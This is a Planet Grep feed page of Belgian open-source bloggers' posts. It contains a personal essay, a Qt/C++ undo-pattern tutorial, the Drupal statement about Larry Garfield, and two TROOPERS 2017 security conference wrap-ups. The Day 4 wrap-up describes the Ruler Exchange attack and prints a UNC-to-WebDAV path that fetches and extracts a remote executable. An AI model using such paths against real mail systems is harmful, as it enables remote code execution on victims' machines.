Planet Grep

Planet'ing Belgian FLOSS people

Planet Grep is maintained by Wouter Verhelst. All times are in UTC.

March 26, 2017

Some stories start badly. Very badly. But, little by little, life finds its way through the worst situations and blossoms into frail and marvellous buds.

This story begins on January 7, 2015. That day, I ran into Damien Van Achter, devastated by what was happening in Paris. He talked to me about deaths. I didn't understand. I then opened Twitter and discovered the scale of the attacks against Charlie Hebdo.

I didn't know it yet, but those attacks would change my life. For the better. Incredibly, wonderfully better.

In the moment, shocked in my turn, I fired off an immediate, instinctive tweet. Being myself sometimes the author of tasteless humour, I felt my values were under attack.

That tweet would be retweeted more than 10,000 times, published in the media, on television, in a printed book and, above all, on Facebook, where it was turned into an image by Pierre Berget, reshared and read by hundreds of thousands of people.

Among them, a young woman. Intrigued, she started reading my blog and sent me a voluntary payment. After running into me by chance at the inauguration of the Rue du Web coworking space, she contacted me on Facebook to discuss some of our respective ideas.

Two years later, on March 9, 2017, the day of my 36th birthday, this young woman, with whom I am madly in love, gave birth to Miniploum, my son. The most beautiful of birthday presents…

I smile, I savour life and I am happy. This happiness, this love I am lucky enough to live, do I not owe it in part to the social networks that turned a despicable attack into a new life?

Let us remember that every tragedy, every catastrophe carries within it the seeds of future happiness. Happiness that may not always make the headlines, that sells fewer papers, but that forms the foundation of each of our lives.

Let us also remember that tools, whatever they may be, only become what we make of them. They are neither good nor bad. It is our responsibility to turn them into sources of happiness…

This text was published thanks to your regular support on Tipeee and Paypal. I am @ploum, blogger, writer, speaker and futurologist. You can follow me on Facebook, Medium or contact me.

This text is published under the CC-By BE license.

March 24, 2017

I published the following diary on isc.sans.org: “Nicely Obfuscated JavaScript Sample“.

One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. By having a look at the file manually, it is heavily obfuscated and the payload is encoded in a unique variable… [Read more]

[The post [SANS ISC] Nicely Obfuscated JavaScript Sample has been first published on /dev/random]

Among the problems we'll face: we want asynchronous APIs that are undoable; we want to be able to switch between read-only, undoable editing and non-undoable editing; and QML doesn't really work well with QFuture. At least not yet. We want an interface that is easy to talk to from QML, yet we want to switch between complicated behaviors.

We will also want synchronous mode and asynchronous mode. Because I just invented that requirement out of thin air.

Ok, first the "design". We have a lot of behaviors for something that can do something: the behaviors perform, for that something, the actions it can do. That is the strategy design pattern, then. It's the one about ducks with a wing-fly behavior, a rocket-propelled fly behavior, and the ostrich that has a can't-fly behavior. For undo and redo, we have the command pattern. We have a neat thing in Qt for that (QUndoCommand plus QUndoStack), so we'll use it. We don't reinvent the wheel. Reinventing the wheel is stupid.

Let's create the duck. I mean, the thing-editor, as I will use "Thing" for the thing that is being edited. We want copy (sync is sufficient), paste (must be async), and edit (must be async). We could also have insert and delete, but those APIs would look just like edit. Paste is usually similar to insert, of course, except that it can be a combined delete and insert when overwriting content. The command pattern allows you to make such combinations. Not the purpose of this example, though.

Enough explanation. Let's start! The ThingEditor is like the flying duck in the strategy pattern. This is going to be more or less the API that we will present to the QML world. It could be your ViewModel, for example (i.e. you could let your ThingViewModel subclass ThingEditor).

class ThingEditor : public QObject
{
    Q_OBJECT

    Q_PROPERTY ( ThingEditingBehavior* editingBehavior READ editingBehavior
                 WRITE setEditingBehavior NOTIFY editingBehaviorChanged )
    Q_PROPERTY ( Thing* thing READ thing WRITE setThing NOTIFY thingChanged )

public:
    explicit ThingEditor( QSharedPointer<Thing> &a_thing,
            ThingEditingBehavior *a_editBehavior,
            QObject *a_parent = nullptr );

    explicit ThingEditor( QObject *a_parent = nullptr );

    Thing* thing() const { return m_thing.data(); }
    virtual void setThing( QSharedPointer<Thing> &a_thing );
    virtual void setThing( Thing *a_thing );

    ThingEditingBehavior* editingBehavior() const { return m_editingBehavior.data(); }
    virtual void setEditingBehavior ( ThingEditingBehavior *a_editingBehavior );

    Q_INVOKABLE virtual void copyCurrentToClipboard ( );
    Q_INVOKABLE virtual void editCurrentAsync( const QString &a_value );
    Q_INVOKABLE virtual void pasteCurrentFromClipboardAsync( );

signals:
    void editingBehaviorChanged ();
    void thingChanged();
    void editCurrentFinished( EditCurrentCommand *a_command );
    void pasteCurrentFromClipboardFinished( EditCurrentCommand *a_command );

private slots:
    void onEditCurrentFinished();
    void onPasteCurrentFromClipboardFinished();

private:
    QScopedPointer<ThingEditingBehavior> m_editingBehavior;
    QSharedPointer<Thing> m_thing;
    QList<QFutureWatcher<EditCurrentCommand*> *> m_editCurrentFutureWatchers;
    QList<QFutureWatcher<EditCurrentCommand*> *> m_pasteCurrentFromClipboardFutureWatchers;
};

For the implementation of this class, I'll only provide the non-obvious pieces. I'm sure you can write setThing, setEditingBehavior and the constructors yourself. I'm also providing the asynchronous plumbing only once, and only for EditCurrentCommand: the paste counterpart is going to be exactly the same.
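For completeness, here is a minimal sketch of what those "obvious" setters might look like (my sketch, not code from the original post; adapt as needed):

void ThingEditor::setThing( QSharedPointer<Thing> &a_thing )
{
    if ( m_thing != a_thing ) {
        m_thing = a_thing;
        emit thingChanged();
    }
}

void ThingEditor::setEditingBehavior( ThingEditingBehavior *a_editingBehavior )
{
    if ( m_editingBehavior.data() != a_editingBehavior ) {
        // QScopedPointer::reset() deletes the old behavior and takes ownership of the new one
        m_editingBehavior.reset( a_editingBehavior );
        if ( a_editingBehavior )
            a_editingBehavior->setEditor( this );
        emit editingBehaviorChanged();
    }
}

With that out of the way, here are the non-obvious pieces: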

void ThingEditor::copyCurrentToClipboard ( )
{
    m_editingBehavior->copyCurrentToClipboard( );
}

void ThingEditor::onEditCurrentFinished( )
{
    QFutureWatcher<EditCurrentCommand*> *resultWatcher
            = static_cast<QFutureWatcher<EditCurrentCommand*>*> ( sender() );
    emit editCurrentFinished ( resultWatcher->result() );
    if (m_editCurrentFutureWatchers.contains( resultWatcher )) {
        m_editCurrentFutureWatchers.removeAll( resultWatcher );
    }
    delete resultWatcher;
}

void ThingEditor::editCurrentAsync( const QString &a_value )
{
    QFutureWatcher<EditCurrentCommand*> *resultWatcher
            = new QFutureWatcher<EditCurrentCommand*>();
    connect ( resultWatcher, &QFutureWatcher<EditCurrentCommand*>::finished,
              this, &ThingEditor::onEditCurrentFinished, Qt::QueuedConnection );
    resultWatcher->setFuture ( m_editingBehavior->editCurrentAsync( a_value ) );
    m_editCurrentFutureWatchers.append ( resultWatcher );
}
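Given that the paste counterpart is "going to be exactly the same", it would presumably look like this (my sketch, mirroring the edit variant above and the signatures declared in the class):

void ThingEditor::pasteCurrentFromClipboardAsync( )
{
    QFutureWatcher<EditCurrentCommand*> *resultWatcher
            = new QFutureWatcher<EditCurrentCommand*>();
    connect ( resultWatcher, &QFutureWatcher<EditCurrentCommand*>::finished,
              this, &ThingEditor::onPasteCurrentFromClipboardFinished, Qt::QueuedConnection );
    resultWatcher->setFuture ( m_editingBehavior->pasteCurrentFromClipboardAsync() );
    m_pasteCurrentFromClipboardFutureWatchers.append ( resultWatcher );
}

void ThingEditor::onPasteCurrentFromClipboardFinished( )
{
    QFutureWatcher<EditCurrentCommand*> *resultWatcher
            = static_cast<QFutureWatcher<EditCurrentCommand*>*> ( sender() );
    emit pasteCurrentFromClipboardFinished ( resultWatcher->result() );
    m_pasteCurrentFromClipboardFutureWatchers.removeAll( resultWatcher );
    delete resultWatcher;
}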

For Qt's undo framework we'll need a QUndoCommand: for each undoable action we indeed need to make such a command. You could add more state and pass it to the constructor. It's common, for example, to pass the Thing, the ThingEditor or the behavior (this is why I used QSharedPointer for those: as long as your command lives on the undo stack, you'll need it to hold a reference to that state).

class EditCurrentCommand: public QUndoCommand
{
public:
    explicit EditCurrentCommand( const QString &a_value,
                                 QUndoCommand *a_parent = nullptr )
        : QUndoCommand ( a_parent )
        , m_value ( a_value ) { }
    void redo() Q_DECL_OVERRIDE {
       // Perform action goes here
    }
    void undo() Q_DECL_OVERRIDE {
      // Undo what got performed goes here
    }
private:
    const QString m_value; // store by value: a reference member would dangle once the caller's string goes away
};

You can (and probably should) also make this one abstract (and/or a so-called pure interface), as you'll usually want many implementations of it (one for every kind of editing behavior). Note that it leaks the QUndoCommand instances unless you handle them (i.e. by storing them in a QUndoStack). That in itself is a good reason to keep it abstract.

class ThingEditingBehavior : public QObject
{
    Q_OBJECT

    Q_PROPERTY ( ThingEditor* editor READ editor WRITE setEditor NOTIFY editorChanged )
    Q_PROPERTY ( Thing* thing READ thing NOTIFY thingChanged )

public:
    explicit ThingEditingBehavior( ThingEditor *a_editor,
                                   QObject *a_parent = nullptr )
        : QObject ( a_parent )
        , m_editor ( a_editor ) { }

    explicit ThingEditingBehavior( QObject *a_parent = nullptr )
        : QObject ( a_parent ) { }

    ThingEditor* editor() const { return m_editor.data(); }
    virtual void setEditor( ThingEditor *a_editor );
    Thing* thing() const;

    virtual void copyCurrentToClipboard ( );
    virtual QFuture<EditCurrentCommand*> editCurrentAsync( const QString &a_value, bool a_exec = true );
    virtual QFuture<EditCurrentCommand*> pasteCurrentFromClipboardAsync( bool a_exec = true );

protected:
    virtual EditCurrentCommand* editCurrentSync( const QString &a_value, bool a_exec = true );
    virtual EditCurrentCommand* pasteCurrentFromClipboardSync( bool a_exec = true );

signals:
    void editorChanged();
    void thingChanged();

private:
    QPointer<ThingEditor> m_editor;
    bool m_synchronous = true;
};

That setEditor, the constructor, etc: these are too obvious to write here. Here are the non-obvious ones:

void ThingEditingBehavior::copyCurrentToClipboard ( )
{
    // Intentionally empty here: concrete behaviors decide what "copy" means.
}

EditCurrentCommand* ThingEditingBehavior::editCurrentSync( const QString &a_value, bool a_exec )
{
    EditCurrentCommand *ret = new EditCurrentCommand ( a_value );
    if ( a_exec )
        ret->redo();
    return ret;
}

QFuture<EditCurrentCommand*> ThingEditingBehavior::editCurrentAsync( const QString &a_value, bool a_exec )
{
    QFuture<EditCurrentCommand*> resultFuture =
            QtConcurrent::run( QThreadPool::globalInstance(), this,
                               &ThingEditingBehavior::editCurrentSync,
                               a_value, a_exec );
    if (m_synchronous)
        resultFuture.waitForFinished();
    return resultFuture;
}

And now we can make the whole thing undoable by making an undoable editing behavior. I'll leave a non-undoable editing behavior as an exercise to the reader (i.e. just perform redo() on the QUndoCommand, don't store it in a QUndoStack, and delete the instance once nothing needs it anymore; note that QUndoCommand is not a QObject, so there is no deleteLater() to lean on).
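Following that hint, a minimal non-undoable behaviour could look roughly like this (again my sketch, not code from the post; the paste variant would follow the same pattern):

class NonUndoableThingEditingBehavior : public ThingEditingBehavior
{
    Q_OBJECT
public:
    explicit NonUndoableThingEditingBehavior( ThingEditor *a_editor,
                                              QObject *a_parent = nullptr )
        : ThingEditingBehavior ( a_editor, a_parent ) { }
protected:
    EditCurrentCommand* editCurrentSync( const QString &a_value, bool a_exec = true ) Q_DECL_OVERRIDE
    {
        Q_UNUSED(a_exec)
        // Just perform the edit; no QUndoStack involved. The command still travels
        // back through the QFuture, so whoever receives editCurrentFinished() stays
        // responsible for deleting it (otherwise it leaks, as noted earlier).
        return ThingEditingBehavior::editCurrentSync( a_value, true );
    }
};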

Note that if m_synchronous is false, (all access to) m_undoStack, and the undo and redo methods of your QUndoCommands, must be (made) thread-safe. Thread-safety is not the purpose of this example, though.

class UndoableThingEditingBehavior : public ThingEditingBehavior
{
    Q_OBJECT
public:
    explicit UndoableThingEditingBehavior( ThingEditor *a_editor,
                                           QObject *a_parent = nullptr );
protected:
    EditCurrentCommand* editCurrentSync( const QString &a_value, bool a_exec = true ) Q_DECL_OVERRIDE;
    EditCurrentCommand* pasteCurrentFromClipboardSync( bool a_exec = true ) Q_DECL_OVERRIDE;
private:
    QScopedPointer<QUndoStack> m_undoStack;
};

EditCurrentCommand* UndoableThingEditingBehavior::editCurrentSync( const QString &a_value, bool a_exec )
{
    Q_UNUSED(a_exec)
    EditCurrentCommand *undoable = ThingEditingBehavior::editCurrentSync( a_value, false );
    m_undoStack->push( undoable ); // QUndoStack::push() calls redo() on the command for us
    return undoable;
}

EditCurrentCommand* UndoableThingEditingBehavior::pasteCurrentFromClipboardSync( bool a_exec )
{
    Q_UNUSED(a_exec)
    EditCurrentCommand *undoable = ThingEditingBehavior::pasteCurrentFromClipboardSync( false );
    m_undoStack->push( undoable );
    return undoable;
}
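To close the loop, here is a hypothetical way to wire it all together and hand it to QML (none of this appears in the original post; Thing and main.qml are placeholders, and the headers for the classes above are assumed):

#include <QGuiApplication>
#include <QQmlApplicationEngine>
#include <QQmlContext>
// plus the headers for Thing, ThingEditor and UndoableThingEditingBehavior from above

int main( int argc, char *argv[] )
{
    QGuiApplication app( argc, argv );

    QSharedPointer<Thing> thing( new Thing() );          // your model class
    ThingEditor editor;
    editor.setEditingBehavior( new UndoableThingEditingBehavior( &editor ) );
    editor.setThing( thing );

    QQmlApplicationEngine engine;
    // QML can now call the Q_INVOKABLE methods, e.g. thingEditor.editCurrentAsync("new value")
    engine.rootContext()->setContextProperty( "thingEditor", &editor );
    engine.load( QUrl( QStringLiteral( "qrc:/main.qml" ) ) );

    return app.exec();
}

Switching between undoable, non-undoable or read-only editing then boils down to calling setEditingBehavior() with a different behaviour instance at runtime.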

March 23, 2017

I'm just back from Heidelberg, so here is the last wrap-up for the TROOPERS 2017 edition. This day was a little more difficult due to the fatigue and yesterday's social event. That's why this wrap-up will be shorter… The second keynote was presented by Mara Tam: "Magical thinking … and how to thwart it". Mara is an advisor to executive agencies on information security issues. Her job focuses on the technical and strategic implications of regulatory and policy activity. In my opinion, the keynote topic remained fairly classic. Mara explained her vision of the problems the infosec community faces when information must be exchanged with "the outside world". Personally, I found Mara's slides difficult to understand.

For the first presentation of the day, I stayed in the main room – the offensive track – to follow "How we hacked distributed configuration management systems" by Francis Alexander and Bharadwaj Machhiraju. As we already saw yesterday with SDN, automation is a hot topic and companies tend to install specific tools to automate configuration tasks. Such software is called DCM, or "Distributed Configuration Management". They simplify the maintenance of complex infrastructures, synchronization and service discovery. But, like any software, they have bugs or vulnerabilities and are a nice target for a pentester. They're real goldmines because they contain not just configuration files; if an attacker can change those, it's even more dangerous. DCMs can be agent-less or agent-based. The latter case was the target of Francis & Bharadwaj. They reviewed three tools:

  • HashiCorp Consul
  • Apache Zookeeper
  • CoreOS etcd

For each tool, they explained the vulnerabilities they found and how they were exploited, up to remote code execution. The crazy part is that none of them has authentication enabled by default! To automate the search for DCMs and their exploitation, they developed a specific tool called Garfield. Nice demos were performed during the talk, with many remote shells and calc.exe spawned here and there.

The next talk was my favourite of the day. It was about a tool called Ruler, used to pivot through Exchange servers. Etienne Stalmans presented his research on Microsoft Exchange and how he reverse engineered the protocol. The goal is simply to get a shell through Exchange. The classic phases of an attack were reviewed:

  • Reconnaissance
  • Exploitation
  • Persistence (always better!)

Basically, Exchange is a mail server, but many more features are available: calendar, Lync, Skype, etc. Exchange must be able to serve local and remote users, so it exposes services on the Internet. How do you identify companies that use an Exchange server, and how do you find it? Simply thanks to the auto-discovery feature implemented by Microsoft. If your domain is company.com, Outlook will search for https://company.com/autodiscover/autodiscover.xml (plus alternative URLs if this one isn't usable). Etienne did some research and found that 10% of Internet domains have this process enabled. After some triage, he found that approximately 26,000 domains are linked to an Exchange server. Nice attack surface! The next step is to compromise at least one account. Here, classic methods can be used (brute-force, rogue wireless AP, phishing or dumps of leaked databases). The exploitation itself is performed by creating a rule that will execute a script. The rule looks like: "When the word 'pwned' is present in the subject, start 'badprogram.exe'". A very nice finding is the way Windows converts UNC paths to WebDAV:

\\host.com@SSL\webdav\pew.zip\s.exe

will be converted to:

https://host.com/webdav/pew.zip

And Windows will even extract s.exe for you! Magic!

Etienne performed a nice demo of Ruler, which automates the whole process described above. Then, he demonstrated another tool called Liniaal, which takes care of persistence. To conclude, Etienne explained briefly how to harden Exchange to prevent this kind of attack. Outlook 2016 blocks unsafe rules by default, which is good. An alternative is to block WebDAV and use MFA.

After the lunch, Zoz came back with another funny presentation: "Data Demolition: Gone in 60 seconds!". The idea is simple: when you throw away devices, you must be sure that they don't contain any remaining critical data. Classic examples are hard drives and printers, but also highly mobile devices like drones. The talk was some kind of "Myth Busters" show for hard drives! Different techniques were tested by Zoz:

  • Thermal
  • Kinetic
  • Electric

For each of them, different scenarios were presented and the results demonstrated with small videos. Crazy!

Destroying HD's

What was interesting to notice is that most techniques failed because the disk platters could still be "cleaned" (ex: removing the dust) and maybe become readable again using forensic techniques. For your information, the most effective techniques were: plasma cutter or oxygen injector, nailguns and HV power spike. Just one piece of advice: don't try this at home!

There was a surprise talk in the schedule. The time slot was offered to The Grugq. A renowned security researcher, he presented "Surprise Bitches, Enterprise Security Lessons From Terrorists". He talked about APTs, but not as a buzzword: he gave his own view of how APTs work. For him, the term "APT" was invented by Americans and means: "Asia Pacific Threat".

I finished the day back in the offensive track. Mike Ossmann and Dominic Spill from Great Scott Gadgets presented "Exploring the Infrared, part 2". The first part was presented at ShmooCon. Fortunately, they started with a quick recap: what infrared light is and its applications (remote controls, sensors, communications, heating systems, …). The talk was a series of nice demos in which they used replay-attack techniques to abuse tools/toys that work with IR, like a Duck Hunt game or a remote-controlled shark. The most impressive one was the replay attack against the Bosch audio transmitter. This very expensive device is used at big events for live translations. They were able to reverse engineer the protocol and play a song through the device… You can imagine the impact of such an attack at a live event (ex: switching voices, replacing translations with others, etc). They have many more tests in the pipeline.

IR Fun

The last talk was "Blinded Random Block Corruption" by Rodrigo Branco. Rodrigo is a regular speaker at TROOPERS and always provides good content. His presentation was very impressive. The idea is to evaluate the problems around memory encryption: how and why to use it? Physical access to the victim is the worst case: an attacker has access to everything. You implemented full-disk encryption? Cool, but a lot of information sits in memory while the system is running. Access to memory can be obtained via Firewire, PCIe, PCMCIA and new USB standards. What about memory encryption? It's good, but encryption alone is not enough: controls must be implemented. The attack explained by Rodrigo is called "BRBC" or "Blinded Random Block Corruption". After giving the details, a nice demo was performed: how to become root on a locked system. Access to the memory is even easier in virtualized (or cloud) environments. Indeed, many hypervisors allow enabling a "debug" feature per VM. Once activated, the administrator has write access to the memory. Using a debugger, you can apply the BRBC attack and bypass the login procedure. The video demo was impressive.

So, the TROOPERS 10th anniversary edition is over. I spent four awesome days attending nice talks and meeting a lot of friends (old & new). I learned a lot and my todo-list has already expanded.

 

[The post TROOPERS 2017 Day #4 Wrap-Up has been first published on /dev/random]

The Drupal community is committed to welcoming and accepting all people. That includes a commitment not to discriminate against anyone based on their heritage or culture, their sexual orientation, their gender identity, and more. There is strength in being diverse, and as such we work hard to foster a culture of open-mindedness toward differences.

A few weeks ago, I privately asked Larry Garfield, a prominent Drupal contributor, to leave the Drupal project. I did this because it came to my attention that he holds views that are in opposition with the values of the Drupal project.

I had hoped to avoid discussing this decision publicly out of respect for Larry's private life, but now that Larry has written about it on his blog and it is being discussed publicly, I believe I have no choice but to respond on behalf of the Drupal project.

It's not for me to judge the choices anyone makes in their private life or what beliefs they subscribe to. I also don't take any offense to the role-playing activities or sexual preferences of Larry's alternative lifestyle.

What makes this difficult to discuss is that it is not for me to share any of the confidential information that I've received, so I won't point out the omissions in Larry's blog post. However, I can tell you that those who have reviewed Larry's writing, including me, experienced varying degrees of shock and concern.

In the end, I fundamentally believe that all people are created equally. This belief has shaped the values that the Drupal project has held since its early days. I cannot in good faith support someone who actively promotes a philosophy that is contrary to this. The Gorean philosophy promoted by Larry is based on the principle that women are evolutionarily predisposed to serve men and that the natural order is for men to dominate and lead.

While the decision was unpleasant, the choice was clear. I remain steadfast in my obligation to protect the shared values of the Drupal project. This is unpleasant because I appreciate Larry's many contributions to Drupal, because this risks setting a complicated precedent, and because it involves a friend's personal life. The matter is further complicated by the fact that this information was shared by others in a manner I don't find acceptable either; that will be dealt with separately.

However, when a highly-visible community member's private views become public, controversial, and disruptive for the project, I must consider the impact that his words and actions have on others and the project itself. In this case, Larry has entwined his private and professional online identities in such a way that it blurs the lines with the Drupal project. Ultimately, I can't get past the fundamental misalignment of values.

Collectively, we work hard to ensure that Drupal has a culture of diversity and inclusion. Our goal is not just to have a variety of different people within our community, but to foster an environment of connection, participation and respect. We have a lot of work to do on this and we can't afford to ignore discrepancies between the espoused views of those in leadership roles and the values of our culture. It's my opinion that any association with Larry's belief system is inconsistent with our project's goals.

It is my responsibility and obligation to act in the best interest of the project at large and to uphold our values. Decisions like this are unpleasant and disruptive, but important. It is moments like this that test our commitment to our values. We must stand up and act in ways that demonstrate these values. For these reasons, I'm asking Larry to resign from the Drupal project.

Update March 24

After reading hundreds of responses, I wanted to make a clarifying statement. First, I made the decision to ask Larry not to participate in the Drupal project, and separately, the Drupal Association made a decision not to invite Larry to speak at DrupalCon Baltimore or serve as a track chair for it. I can only speak to my decision-making here. It's worth noting that I recused myself from the Drupal Association's decision.

Many have rightfully stated that I haven't made a clear case for the decision. When one side chooses to make their case public it creates an imbalance of information. Only knowing one side skews public opinion heavily towards the publicized viewpoint. While I will not share the evidence that I believe would validate the decision that I made for reasons of liability and confidentiality, I will say that I did not make the decision based on the information or beliefs conveyed in Larry's blog post.

Larry accurately pointed out that some of the evidence was brought forth in a manner that is not in alignment with Drupal values. This manner is being addressed with the CWG. While it's disheartening that some of our community members chose the approach they did to bring the matter regarding Larry forward, that does not change the underlying facts that informed my decision.

(Comments on this post are allowed but for obvious reasons will be moderated.)

Perfection has been reached not when there is nothing left to add, but when there is nothing left to take away.

March 22, 2017

The third day is already over! Today the regular talks were scheduled, split across three tracks: offensive, defensive and a specific one dedicated to SAP. The first slot at 09:00 was, as usual, a keynote. Enno Rey presented ten years of TROOPERS. What happened during all those editions? The main idea behind TROOPERS has always been that everybody must learn something by attending the conference but… with fun and many interactions with other peers! The goal was to mix infosec people coming from different horizons. And, of course, to use the stuff learned to contribute back to the community. Things changed a lot during these ten years; some are better while others remain the same (or worse?). Enno reviewed all the keynotes presented and, for each of them, gave some comments – sometimes funny ones. The conference itself also evolved, with a SAP track, the Telco Sec Day, the NGI track and the move to Heidelberg. Some famous vulnerabilities were covered, like MS08-067 or the RSA hack. What we've seen:

  • A move from theory to practice
  • Some things/crap that stay the same (same shit, different day)
  • A growing importance of the socio-economic context around security.

Has progress been made? Enno reviewed infosec in three dimensions:

  • As a (scientific) discipline: From theory to practice. So yes, progress has been made
  • In enterprise environments: some issues on endpoints have been fixed, but there is a catch: Windows security has become much better, but now people use Android :). Security in the datacenter also improved, but now there is the cloud. 🙂
  • As a constituent for our society: Complexity is ever growing.

Are automated systems the solution? There are still technical and human factors that matter: "Errare Humanum Est", said Enno. Information security is still a work in progress and we have to work for it. Again, the example of the IoT crap was used. Education is key. So, yes, the TROOPERS motto is still valid: "Make the world a better place". Based on the applause from the audience, this was a great keynote by a visibly moved Enno!

I started my day in the defensive track. Veronica Valeros presented "Hunting Them All". Why do we need hunting capabilities? A definition of threat hunting is "to help in spotting attacks that would get past our existing controls and do more damage to the business".

Veronica's Daily Job: Hunting!

People are constantly hit by threats (spam, phishing, malware, trojans, RATs, … you name them). Being always online also increases our attack surface. Attacks are very lucrative and attract a lot of bad guys. Sometimes, malware may change things: a good example is the ransomware plague, which made people aware that backups are critical. Threat hunting is not easy because, when you are sitting on your network, you don't always know what to search for. And malicious activity does not always rely on top-notch technologies. Attackers are not all 'l33t'. They just want to bypass controls and make their malicious code run. To achieve this, they have a lot of time, they abuse the weakest link and they hide in plain sight. To sum up: they follow the "least effort" rule. Which sounds legit, right? Veronica has access to a lot of data. Her team performs hunting across hundreds of networks, millions of users and billions of web requests. How to process all this? Machine learning came to the rescue, and Veronica's job is to check and validate the output of the machine learning process they developed. But it's not a magic tool that will solve all issues. The focus must be on what's important: going from 10B requests/day down to 20K incidents/day using anomaly detection, trust modelling, event classification, entity & user modelling. Veronica gave an example. The Sality botnet has been active since 2003 and is still present. IOCs exist but they generate a lot of false positives, and regular expressions are not flexible enough. Can we create algorithms to automatically track malicious behaviour? For some threats it works, for others it doesn't. Veronica's team is tracking 200+ malicious behaviours, and 60% of the tracking is automated. "Let the machine do the machine work". As a good example, Veronica explained how referrers can be the source of important data leaks from corporate networks.

My next choice was "Securing Network Automation" by Ivan Pepelnjak. In a previous talk, Ivan explained why Software Defined Networking failed, but many vendors have improved since, which is good. So today, his new topic was about ways to improve automation from a security perspective. Indeed, we must automate as much as possible, but how do we make it reliable and secure? If a process is well defined, it can be automated, said Ivan. Why automate? From a management perspective, the same reasons always come up: increase flexibility while reducing costs, deploy faster and compete with public cloud offerings. About the cloud: do we need to buy or to build? In any case, you'll have to build if you want to automate. The real challenge is to move quickly from development to test and production. To achieve this, instead of editing a device configuration live, create configuration text files and push them to a GitLab server. Then you can virtualise a lab, pull the configs and test them. Did it work? Then merge with the main branch. A lot can be automated: device provisioning, VLAN management, ACLs, firewall rules. But the challenge is to have strong controls to prevent issues upfront and troubleshoot when needed. A nice quote was:

"To make a mistake is human. To automatically deploy that mistake to all servers, use DevOps."

You remember the recent Amazon outage story? Be prepared to face issues. To automate, you need tools, and those tools must be secure too. An example was given with Ansible. The issue is that it gathers information from untrusted sources:

  • Scripts are executed on managed devices: what about data injection?
  • Custom scripts are included in data gathering: More data injection?
  • Returned data are not properly parsed: Risk of privilege escalation?

The usual controls to put in place are:

  • OOB management
  • Management network / VR
  • Limit access to the management hosts
  • SSH-based access
  • Use SSH keys
  • RBAC (commit scripts)

Keep in mind: your network is critical, so automation (network programming) is too. Don't write the code yourself (hire a skilled Python programmer for this task), but you must know what the code should do. Test, test, test and, once done, test again. As an example of a control, you can perform a traceroute before and after the change and compare the paths. Ivan published a nice list of requirements to give your vendor when looking for a new network device. If your current vendor cannot provide basic requirements like an API, change it!

After the lunch, back to the defence & management track with "Vox Ex Machina" by Graeme Neilson. The title looked interesting: was it more offensive or defensive content? Voice recognition is used more and more (examples: Cortana, Siri, etc), but also on non-IT systems like banking or support systems: "Press 1 for X or press 2 for Y". But is it secure? Voice recognition is not new hype: there are references to the "Voder" as early as 1939. Another system was the Vocoder, a few years later. Voice recognition is based on two methods: phrase dependent or independent (this talk focused on the first method). The process is split into three phases:

  • Enrolment: you record a phrase several times. Each recording must be different, and the analysis is stored as a voice print.
  • Authentication: based on feature extraction or MFCC (Mel-Frequency Cepstral Coefficients).
  • Confidence: returned as a percentage.

The next part of the talk focused on the tool developed by Graeme. Written in Python, it tests a remote API. The supported attacks are: replay, brute-force and voice print fixation. An important remark made by Graeme: even if some services pretend otherwise, your voice is NOT a key! Every time you pronounce a word, the generated file is different. That's why the brute-forcing process is completely different with voice recognition: you know when you are getting closer thanks to the returned confidence (in %), instead of a password comparison which returns "0" or "1". The tool developed by Graeme is available here (or will be soon after the conference).

The next talk was presented by Matt Graeber and Casey Smith: "Architecting a Modern Defense using Device Guard". The talk was scheduled in the defensive track but it covered both worlds. The question that interests many people is: is whitelisting a good solution? Bad guys (and red teams) are trying to find bypass strategies. What mitigations are available for the blue teams? The attacker's goal is clear: execute HIS code on YOUR computer. There are two types of attackers: those who know what controls you have in place (enlightened) and the novices who aren't equipped to handle your controls (ex: the massive phishing campaigns dropping Office documents with malicious macros). Device Guard offers the following protections:

  • Prevents unauthorised code execution,
  • Restricted scripting environment
  • Prevents policy tampering, backed by virtualisation-based security

The speakers were honest: Device Guard does NOT protect against all threats, but it increases the noise (evidence) an attacker generates. Bypasses are possible. How?

  • Policy misconfiguration
  • Misplaced trust
  • Enlightened scripting environments
  • Exploitation of vulnerable code
  • Implementation flaws

How you deploy your policy depends on your environment, but also on the security ecosystem we live in. Would you trust all code signed by Google? Probably yes. Do you trust any certificate issued by Symantec? Probably not. The next part of the talk was a review of the different bypass techniques (offensive) and then some countermeasures (defensive). A nice demo was performed with PowerShell to bypass the constrained language mode. Keep in mind that some whitelisted applications might be vulnerable. Do you remember the VirtualBox signed driver vulnerability? Besides those problems, Device Guard offers many advantages:

  • Uncomplicated deployment
  • DLL enforcement implicit
  • Supported across windows ecosystem
  • Core system component
  • Powershell integration

Conclusion: whitelisting is often a huge debate (pro/con). Despite the flaws, it forces adversaries to reset their tactics. By doing this you disrupt the attackers' economics: if it makes the system harder to compromise, it will cost them more time/money.

After the afternoon coffee break, I switched to the offensive track again to follow Florian Grunow and Niklaus Schuss, who presented "Exploring North Korea's Surveillance Technology". I had no idea about the content of the talk, but it was really interesting and an eye-opener! It's a fact: if it's locked down, it must be interesting. That's why Florian and Niklaus performed research on the systems provided to DPRK citizens ("Democratic People's Republic of Korea"). The research was based on papers published by others and on leaked devices / operating systems; they never went over there. The motivation behind the research was to get a clear view of the surveillance and censorship put in place by the government. It started with the Linux distribution called "Red Star OS". It is based on Fedora/KDE, has gone through multiple versions and looks like a modern Linux distribution, but… First finding: the certificates installed in the browser all come from the Korean authorities. Also, some suspicious processes cannot be killed. Integrity checks are performed on system files, and downloaded files are changed on the fly by the OS (example: files transferred via USB storage). The OS adds a watermark at the end of the file, which helps identify the computer that was used. If the file is transferred to another computer, a second watermark is added, and so on. This is a nice way to track dissidents and to build a graph of the relations between them. Note that this watermark is only added to data files and that it can easily be removed. An antivirus is installed but can also be used to delete files based on their hash. Of course, the AV update servers are maintained by the government. After the desktop OS, the speakers reviewed some "features" of the "Woolim" tablet. This device is based on Android and does not have any connectivity on board: you must use a specific USB dongle for that (provided by the government, of course). When you try to open some files, you get the warning "This is not signed file". Indeed, the tablet only works with files signed by the government or locally (based on RSA signatures). The goal, here again, is to prevent the distribution of media files. From a network perspective, there is no direct Internet access and all traffic is routed through proxies. An interesting application running on the tablet is called "TraceViewer". It takes a screenshot of the tablet at regular intervals. The user cannot delete the screenshots, and random physical controls can be performed by the authorities to keep the pressure on citizens. This talk was really an eye-opener for me. Really crazy stuff!

Finally, my last choice was another defensive-track talk: "Arming Small Security Programs" by Matthew Domko. The idea is to generate a network baseline, exactly like we do for applications on Windows. For many organizations, the problem is detecting malicious activity on the network. Using an IDS quickly becomes useless due to the number of signatures and their limitations. Matthew's idea was to:

  • Build a baseline (all IPs, all ports)
  • Write snort rules
